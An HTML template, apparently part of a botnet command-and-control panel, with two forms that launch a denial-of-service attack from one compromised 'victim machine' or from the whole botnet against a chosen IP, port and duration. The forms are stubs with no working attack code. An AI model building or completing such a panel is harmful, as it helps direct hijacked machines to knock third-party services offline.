<app-menu></app-menu>
<h2>EXECUTE D.O.S ATTACK FROM VICTIM MACHINE TO OTHERS</h2>
<hr />
<form action="" class="form">
  <!--form action es donde se mandará la info al php-->
  <p class="title">Execute this module to launch a D.O.S attack against other IP/DNS.</p>
  <p>Link HTTP server where binary is("http://localhost")<input type="text" /></p>
  <p>Remote IP/DNS Server <input type="text" /></p>
  <p>Remote port <input type="text" /></p>
  <p>Duration of the attack in Miliseconds <input type="text" /></p>
  <input type="submit" value="Launch DOS" />
</form>

<h2>EXECUTE D.O.S ATTACK FROM ALL VICTIM MACHINES BOTNET TO OTHERS</h2>
<hr />
<form action="" class="form">
  <!--form action es donde se mandará la info al php-->
  <p class="title">Execute this module to launch a masive D.O.S attack from all BOTNET against other IP/DNS.</p>
  <p>Link HTTP server where binary is("http://localhost")<input type="text" /></p>
  <p>Remote IP/DNS Server<input type="text" /></p>
  <p>Remote Port <input type="text" /></p>
  <p>Duration of the attack in Miliseconds <input type="text" /></p>
  <input type="submit" value="Launch DOS" />
</form>
